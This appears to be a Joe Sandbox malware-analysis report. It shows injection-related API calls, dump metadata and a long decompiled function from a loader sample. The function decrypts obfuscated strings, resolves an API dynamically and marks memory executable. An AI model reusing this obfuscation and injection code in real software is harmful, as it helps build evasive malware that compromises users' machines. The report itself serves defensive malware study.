VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0041B6CE
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0041B6E9
SetThreadContext.KERNELBASE(?,00010007), ref: 0041B706
ResumeThread.KERNELBASE(?), ref: 0041B713

Strings

D, xrefs: 0041B3C2

Memory Dump Source

Source File: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID: D
API String ID: 12256240-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: f366c55a1b4d0d674bedc16c77e52ae0afadc92a8431f0e658c8350608c560d2
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: 99121771E00219ABDB21CFA4CD84BEEBBB5FF44704F1484AAE519E6290E7749A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004018B0 Relevance: 29.1, APIs: 3, Strings: 13, Instructions: 1123
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004018B0(signed int __eax, void* _a4, long _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				struct HINSTANCE__* _v52;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				signed int _v113;
				signed char _v120;
				signed int _v121;
				signed char _t645;
				void* _t734;

				_t645 = __eax;
				_v108 =  *0x4176a8;
				_v108 =  *0x4176a4;
				_v108 =  *0x4176a0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((__eax & 0x00000044) == 0) {
					_v108 =  *0x41769c;
					_v108 =  *0x417698;
				}
				_v108 =  *0x417694;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v108 =  *0x417690;
					_v108 =  *0x41768c;
				}
				_v108 =  *0x417688;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v108 =  *0x417684;
					_v108 =  *0x417680;
				}
				_v108 =  *0x41767c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v108 =  *0x417678;
					_v108 =  *0x417674;
				}
				_v108 =  *0x417670;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v108 =  *0x41766c;
					_v108 =  *0x417668;
				}
				_v32 =  *0x417664;
				_v32 =  *0x417660;
				_v32 =  *0x41765c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v32 =  *0x417658;
					_v32 =  *0x417654;
				}
				_v32 =  *0x417650;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v32 =  *0x41764c;
					_v32 =  *0x417648;
				}
				_v32 =  *0x417644;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v32 =  *0x417640;
					_v32 =  *0x41763c;
				}
				_v32 =  *0x417638;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v32 =  *0x417634;
					_v32 =  *0x417630;
				}
				_v32 =  *0x41762c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v32 =  *0x417628;
					_v32 =  *0x417624;
				}
				_v44 =  *0x417620;
				_v44 =  *0x41761c;
				_v44 =  *0x417618;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v44 =  *0x417614;
					_v44 =  *0x417610;
				}
				_v44 =  *0x41760c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v44 =  *0x417608;
					_v44 =  *0x417604;
				}
				_v44 =  *0x417600;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v44 =  *0x4175fc;
					_v44 =  *0x4175f8;
				}
				_v44 =  *0x4175f4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v44 =  *0x4175f0;
					_v44 =  *0x4175ec;
				}
				_v44 =  *0x4175e8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v44 =  *0x4175e4;
					_v44 =  *0x4175e0;
				}
				_v40 =  *0x4175dc;
				_v40 =  *0x4175d8;
				_v40 =  *0x4175d4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v40 =  *0x4175d0;
					_v40 =  *0x4175cc;
				}
				_v40 =  *0x4175c8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v40 =  *0x4175c4;
					_v40 =  *0x4175c0;
				}
				_v40 =  *0x4175bc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v40 =  *0x4175b8;
					_v40 =  *0x4175b4;
				}
				_v40 =  *0x4175b0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v40 =  *0x4175ac;
					_v40 =  *0x4175a8;
				}
				_v40 =  *0x4175a4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v40 =  *0x4175a0;
					_v40 =  *0x41759c;
				}
				_v104 =  *0x417598;
				_v104 =  *0x417594;
				_v104 =  *0x417590;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v104 =  *0x41758c;
					_v104 =  *0x417588;
				}
				_v104 =  *0x417584;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v104 =  *0x417580;
					_v104 =  *0x41757c;
				}
				_v104 =  *0x417578;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v104 =  *0x417574;
					_v104 =  *0x417570;
				}
				_v104 =  *0x41756c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v104 =  *0x417568;
					_v104 =  *0x417564;
				}
				_v104 =  *0x417560;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v104 =  *0x41755c;
					_v104 =  *0x417558;
				}
				_v96 =  *0x417554;
				_v96 =  *0x417550;
				_v96 =  *0x41754c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v96 =  *0x417548;
					_v96 =  *0x417544;
				}
				_v96 =  *0x417540;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v96 =  *0x41753c;
					_v96 =  *0x417538;
				}
				_v96 =  *0x417534;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v96 =  *0x417530;
					_v96 =  *0x41752c;
				}
				_v96 =  *0x417528;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v96 =  *0x417524;
					_v96 =  *0x417520;
				}
				_v96 =  *0x41751c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v96 =  *0x417518;
					_v96 =  *0x417514;
				}
				_v28 =  *0x417510;
				_v28 =  *0x41750c;
				_v28 =  *0x417508;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v28 =  *0x417504;
					_v28 =  *0x417500;
				}
				_v28 =  *0x4174fc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v28 =  *0x4174f8;
					_v28 =  *0x4174f4;
				}
				_v28 =  *0x4174f0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v28 =  *0x4174ec;
					_v28 =  *0x4174e8;
				}
				_v28 =  *0x4174e4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v28 =  *0x4174e0;
					_v28 =  *0x4174dc;
				}
				_v28 =  *0x4174d8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v28 =  *0x4174d4;
					_v28 =  *0x4174d0;
				}
				_v20 =  *0x4174cc;
				_v20 =  *0x4174c8;
				_v20 =  *0x4174c4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v20 =  *0x4174c0;
					_v20 =  *0x4174bc;
				}
				_v20 =  *0x4174b8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v20 =  *0x4174b4;
					_v20 =  *0x4174b0;
				}
				_v20 =  *0x4174ac;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v20 =  *0x4174a8;
					_v20 =  *0x4174a4;
				}
				_v20 =  *0x4174a0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v20 =  *0x41749c;
					_v20 =  *0x417498;
				}
				_v20 =  *0x417494;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v20 =  *0x417490;
					_v20 =  *0x41748c;
				}
				_v68 = 0x2c;
				_v67 = 0x33;
				_v66 = 0x3f;
				_v65 = 0xbd;
				_v64 = 0xb0;
				_v63 = 0x35;
				_v62 = 0x32;
				_v61 = 0xad;
				_v60 = 0x3a;
				_v59 = 0x34;
				_v58 = 0x38;
				_v57 = 0x30;
				_v56 = 0xb1;
				_v55 = 0xbc;
				_v54 = 0;
				_v112 = 0;
				while(_v112 < 0xf) {
					_v113 =  *((intOrPtr*)(_t734 + _v112 - 0x40));
					_v113 = _v113 & 0x000000ff ^ 0x00000084;
					_v113 = (_v113 & 0x000000ff) >> 0x00000007 | (_v113 & 0x000000ff) << 0x00000001;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ 0x000000c7;
					_v113 =  ~(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ _v112;
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 = _v113 & 0x000000ff ^ _v112;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ _v112;
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 = _v113 & 0x000000ff ^ 0x000000c1;
					_v113 = (_v113 & 0x000000ff) - _v112;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = (_v113 & 0x000000ff) - _v112;
					 *((char*)(_t734 + _v112 - 0x40)) = _v113;
					_t645 = _v112 + 1;
					_v112 = _t645;
				}
				_v16 =  *0x417488;
				_v16 =  *0x417484;
				_v16 =  *0x417480;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v16 =  *0x41747c;
					_v16 =  *0x417478;
				}
				_v16 =  *0x417474;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v16 =  *0x417470;
					_v16 =  *0x41746c;
				}
				_v16 =  *0x417468;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v16 =  *0x417464;
					_v16 =  *0x417460;
				}
				_v16 =  *0x41745c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v16 =  *0x417458;
					_v16 =  *0x417454;
				}
				_v16 =  *0x417450;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v16 =  *0x41744c;
					_v16 =  *0x417448;
				}
				_v92 =  *0x417444;
				_v92 =  *0x417440;
				_v92 =  *0x41743c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v92 =  *0x417438;
					_v92 =  *0x417434;
				}
				_v92 =  *0x417430;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v92 =  *0x41742c;
					_v92 =  *0x417428;
				}
				_v92 =  *0x417424;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v92 =  *0x417420;
					_v92 =  *0x41741c;
				}
				_v92 =  *0x417418;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v92 =  *0x417414;
					_v92 =  *0x417410;
				}
				_v92 =  *0x41740c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v92 =  *0x417408;
					_v92 =  *0x417404;
				}
				_v12 =  *0x417400;
				_v12 =  *0x4173fc;
				_v12 =  *0x4173f8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v12 =  *0x4173f4;
					_v12 =  *0x4173f0;
				}
				_v12 =  *0x4173ec;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v12 =  *0x4173e8;
					_v12 =  *0x4173e4;
				}
				_v12 =  *0x4173e0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v12 =  *0x4173dc;
					_v12 =  *0x4173d8;
				}
				_v12 =  *0x4173d4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v12 =  *0x4173d0;
					_v12 =  *0x4173cc;
				}
				_v12 =  *0x4173c8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v12 =  *0x4173c4;
					_v12 =  *0x4173c0;
				}
				_v36 =  *0x4173bc;
				_v36 =  *0x4173b8;
				_v36 =  *0x4173b4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v36 =  *0x4173b0;
					_v36 =  *0x4173ac;
				}
				_v36 =  *0x4173a8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v36 =  *0x4173a4;
					_v36 =  *0x4173a0;
				}
				_v36 =  *0x41739c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v36 =  *0x417398;
					_v36 =  *0x417394;
				}
				_v36 =  *0x417390;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v36 =  *0x41738c;
					_v36 =  *0x417388;
				}
				_v36 =  *0x417384;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v36 =  *0x417380;
					_v36 =  *0x41737c;
				}
				_v88 =  *0x417378;
				_v88 =  *0x417374;
				_v88 =  *0x417370;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v88 =  *0x41736c;
					_v88 =  *0x417368;
				}
				_v88 =  *0x417364;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v88 =  *0x417360;
					_v88 =  *0x41735c;
				}
				_v88 =  *0x417358;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v88 =  *0x417354;
					_v88 =  *0x417350;
				}
				_v88 =  *0x41734c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v88 =  *0x417348;
					_v88 =  *0x417344;
				}
				_v88 =  *0x417340;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v88 =  *0x41733c;
					_v88 =  *0x417338;
				}
				_v100 =  *0x417334;
				_v100 =  *0x417330;
				_v100 =  *0x41732c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v100 =  *0x417328;
					_v100 =  *0x417324;
				}
				_v100 =  *0x417320;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v100 =  *0x41731c;
					_v100 =  *0x417318;
				}
				_v100 =  *0x417314;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v100 =  *0x417310;
					_v100 =  *0x41730c;
				}
				_v100 =  *0x417308;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v100 =  *0x417304;
					_v100 =  *0x417300;
				}
				_v100 =  *0x4172fc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v100 =  *0x4172f8;
					_v100 =  *0x4172f4;
				}
				_v48 =  *0x4172f0;
				_v48 =  *0x4172ec;
				_v48 =  *0x4172e8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v48 =  *0x4172e4;
					_v48 =  *0x4172e0;
				}
				_v48 =  *0x4172dc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v48 =  *0x4172d8;
					_v48 =  *0x4172d4;
				}
				_v48 =  *0x4172d0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v48 =  *0x4172cc;
					_v48 =  *0x4172c8;
				}
				_v48 =  *0x4172c4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v48 =  *0x4172c0;
					_v48 =  *0x4172bc;
				}
				_v48 =  *0x4172b8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v48 =  *0x4172b4;
					_v48 =  *0x4172b0;
				}
				_v8 =  *0x4172ac;
				_v8 =  *0x4172a8;
				_v8 =  *0x4172a4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v8 =  *0x4172a0;
					_v8 =  *0x41729c;
				}
				_v8 =  *0x417298;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v8 =  *0x417294;
					_v8 =  *0x417290;
				}
				_v8 =  *0x41728c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v8 =  *0x417288;
					_v8 =  *0x417284;
				}
				_v8 =  *0x417280;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v8 =  *0x41727c;
					_v8 =  *0x417278;
				}
				_v8 =  *0x417274;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t645 & 0x00000044) == 0) {
					_v8 =  *0x417270;
					_v8 =  *0x41726c;
				}
				_v84 = 0x3d;
				_v83 = 0x2b;
				_v82 = 0xdd;
				_v81 = 0xc3;
				_v80 = 0x2d;
				_v79 = 0xcf;
				_v78 = 0xea;
				_v77 = 0xec;
				_v76 = 0xda;
				_v75 = 0x27;
				_v74 = 0xc5;
				_v73 = 0xdb;
				_v72 = 0xaa;
				_v120 = 0;
				while(_v120 < 0xd) {
					_v121 =  *((intOrPtr*)(_t734 + _v120 - 0x50));
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 =  !(_v121 & 0x000000ff);
					_v121 = _v121 & 0x000000ff ^ 0x0000004b;
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 =  !(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) + _v120;
					_v121 =  !(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) - 0x2d;
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) + _v120;
					_v121 =  !(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) - 5;
					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
					_v121 = (_v121 & 0x000000ff) + _v120;
					_v121 =  ~(_v121 & 0x000000ff);
					 *((char*)(_t734 + _v120 - 0x50)) = _v121;
					_v120 = _v120 + 1;
				}
				_v52 = GetModuleHandleA( &_v84);
				_v24 = 0;
				 *0x43e218 = GetProcAddress(_v52,  &_v68);
				VirtualProtect(_a4, _a8, 0x40,  &_v24); // executed
				return 0;
			}

0x004018b0
0x004018bc
0x004018c5
0x004018ce
0x004018d4
0x004018da
0x004018df
0x004018e7
0x004018f0
0x004018f0
0x004018f9
0x004018ff
0x00401905
0x0040190a
0x00401912
0x0040191b
0x0040191b
0x00401924
0x0040192a
0x00401930
0x00401935
0x0040193d
0x00401946
0x00401946
0x0040194f
0x00401955
0x0040195b
0x00401960
0x00401968
0x00401971
0x00401971
0x0040197a
0x00401980
0x00401986
0x0040198b
0x00401993
0x0040199c
0x0040199c
0x004019a5
0x004019ae
0x004019b7
0x004019bd
0x004019c3
0x004019c8
0x004019d0
0x004019d9
0x004019d9
0x004019e2
0x004019e8
0x004019ee
0x004019f3
0x004019fb
0x00401a04
0x00401a04
0x00401a0d
0x00401a13
0x00401a19
0x00401a1e
0x00401a26
0x00401a2f
0x00401a2f
0x00401a38
0x00401a3e
0x00401a44
0x00401a49
0x00401a51
0x00401a5a
0x00401a5a
0x00401a63
0x00401a69
0x00401a6f
0x00401a74
0x00401a7c
0x00401a85
0x00401a85
0x00401a8e
0x00401a97
0x00401aa0
0x00401aa6
0x00401aac
0x00401ab1
0x00401ab9
0x00401ac2
0x00401ac2
0x00401acb
0x00401ad1
0x00401ad7
0x00401adc
0x00401ae4
0x00401aed
0x00401aed
0x00401af6
0x00401afc
0x00401b02
0x00401b07
0x00401b0f
0x00401b18
0x00401b18
0x00401b21
0x00401b27
0x00401b2d
0x00401b32
0x00401b3a
0x00401b43
0x00401b43
0x00401b4c
0x00401b52
0x00401b58
0x00401b5d
0x00401b65
0x00401b6e
0x00401b6e
0x00401b77
0x00401b80
0x00401b89
0x00401b8f
0x00401b95
0x00401b9a
0x00401ba2
0x00401bab
0x00401bab
0x00401bb4
0x00401bba
0x00401bc0
0x00401bc5
0x00401bcd
0x00401bd6
0x00401bd6
0x00401bdf
0x00401be5
0x00401beb
0x00401bf0
0x00401bf8
0x00401c01
0x00401c01
0x00401c0a
0x00401c10
0x00401c16
0x00401c1b
0x00401c23
0x00401c2c
0x00401c2c
0x00401c35
0x00401c3b
0x00401c41
0x00401c46
0x00401c4e
0x00401c57
0x00401c57
0x00401c60
0x00401c69
0x00401c72
0x00401c78
0x00401c7e
0x00401c83
0x00401c8b
0x00401c94
0x00401c94
0x00401c9d
0x00401ca3
0x00401ca9
0x00401cae
0x00401cb6
0x00401cbf
0x00401cbf
0x00401cc8
0x00401cce
0x00401cd4
0x00401cd9
0x00401ce1
0x00401cea
0x00401cea
0x00401cf3
0x00401cf9
0x00401cff
0x00401d04
0x00401d0c
0x00401d15
0x00401d15
0x00401d1e
0x00401d24
0x00401d2a
0x00401d2f
0x00401d37
0x00401d40
0x00401d40
0x00401d49
0x00401d52
0x00401d5b
0x00401d61
0x00401d67
0x00401d6c
0x00401d74
0x00401d7d
0x00401d7d
0x00401d86
0x00401d8c
0x00401d92
0x00401d97
0x00401d9f
0x00401da8
0x00401da8
0x00401db1
0x00401db7
0x00401dbd
0x00401dc2
0x00401dca
0x00401dd3
0x00401dd3
0x00401ddc
0x00401de2
0x00401de8
0x00401ded
0x00401df5
0x00401dfe
0x00401dfe
0x00401e07
0x00401e0d
0x00401e13
0x00401e18
0x00401e20
0x00401e29
0x00401e29
0x00401e32
0x00401e3b
0x00401e44
0x00401e4a
0x00401e50
0x00401e55
0x00401e5d
0x00401e66
0x00401e66
0x00401e6f
0x00401e75
0x00401e7b
0x00401e80
0x00401e88
0x00401e91
0x00401e91
0x00401e9a
0x00401ea0
0x00401ea6
0x00401eab
0x00401eb3
0x00401ebc
0x00401ebc
0x00401ec5
0x00401ecb
0x00401ed1
0x00401ed6
0x00401ede
0x00401ee7
0x00401ee7
0x00401ef0
0x00401ef6
0x00401efc
0x00401f01
0x00401f09
0x00401f12
0x00401f12
0x00401f1b
0x00401f24
0x00401f2d
0x00401f33
0x00401f39
0x00401f3e
0x00401f46
0x00401f4f
0x00401f4f
0x00401f58
0x00401f5e
0x00401f64
0x00401f69
0x00401f71
0x00401f7a
0x00401f7a
0x00401f83
0x00401f89
0x00401f8f
0x00401f94
0x00401f9c
0x00401fa5
0x00401fa5
0x00401fae
0x00401fb4
0x00401fba
0x00401fbf
0x00401fc7
0x00401fd0
0x00401fd0
0x00401fd9
0x00401fdf
0x00401fe5
0x00401fea
0x00401ff2
0x00401ffb
0x00401ffb
0x00401ffe
0x00402002
0x00402006
0x0040200a
0x0040200e
0x00402012
0x00402016
0x0040201a
0x0040201e
0x00402022
0x00402026
0x0040202a
0x0040202e
0x00402032
0x00402036
0x0040203a
0x0040204c
0x0040205d
0x00402069
0x0040207b
0x00402084
0x00402091
0x0040209a
0x004020a4
0x004020ae
0x004020b8
0x004020c1
0x004020cb
0x004020d5
0x004020e1
0x004020eb
0x004020f4
0x004020fe
0x00402107
0x00402046
0x00402049
0x00402049
0x00402116
0x0040211f
0x00402128
0x0040212e
0x00402134
0x00402139
0x00402141
0x0040214a
0x0040214a
0x00402153
0x00402159
0x0040215f
0x00402164
0x0040216c
0x00402175
0x00402175
0x0040217e
0x00402184
0x0040218a
0x0040218f
0x00402197
0x004021a0
0x004021a0
0x004021a9
0x004021af
0x004021b5
0x004021ba
0x004021c2
0x004021cb
0x004021cb
0x004021d4
0x004021da
0x004021e0
0x004021e5
0x004021ed
0x004021f6
0x004021f6
0x004021ff
0x00402208
0x00402211
0x00402217
0x0040221d
0x00402222
0x0040222a
0x00402233
0x00402233
0x0040223c
0x00402242
0x00402248
0x0040224d
0x00402255
0x0040225e
0x0040225e
0x00402267
0x0040226d
0x00402273
0x00402278
0x00402280
0x00402289
0x00402289
0x00402292
0x00402298
0x0040229e
0x004022a3
0x004022ab
0x004022b4
0x004022b4
0x004022bd
0x004022c3
0x004022c9
0x004022ce
0x004022d6
0x004022df
0x004022df
0x004022e8
0x004022f1
0x004022fa
0x00402300
0x00402306
0x0040230b
0x00402313
0x0040231c
0x0040231c
0x00402325
0x0040232b
0x00402331
0x00402336
0x0040233e
0x00402347
0x00402347
0x00402350
0x00402356
0x0040235c
0x00402361
0x00402369
0x00402372
0x00402372
0x0040237b
0x00402381
0x00402387
0x0040238c
0x00402394
0x0040239d
0x0040239d
0x004023a6
0x004023ac
0x004023b2
0x004023b7
0x004023bf
0x004023c8
0x004023c8
0x004023d1
0x004023da
0x004023e3
0x004023e9
0x004023ef
0x004023f4
0x004023fc
0x00402405
0x00402405
0x0040240e
0x00402414
0x0040241a
0x0040241f
0x00402427
0x00402430
0x00402430
0x00402439
0x0040243f
0x00402445
0x0040244a
0x00402452
0x0040245b
0x0040245b
0x00402464
0x0040246a
0x00402470
0x00402475
0x0040247d
0x00402486
0x00402486
0x0040248f
0x00402495
0x0040249b
0x004024a0
0x004024a8
0x004024b1
0x004024b1
0x004024ba
0x004024c3
0x004024cc
0x004024d2
0x004024d8
0x004024dd
0x004024e5
0x004024ee
0x004024ee
0x004024f7
0x004024fd
0x00402503
0x00402508
0x00402510
0x00402519
0x00402519
0x00402522
0x00402528
0x0040252e
0x00402533
0x0040253b
0x00402544
0x00402544
0x0040254d
0x00402553
0x00402559
0x0040255e
0x00402566
0x0040256f
0x0040256f
0x00402578
0x0040257e
0x00402584
0x00402589
0x00402591
0x0040259a
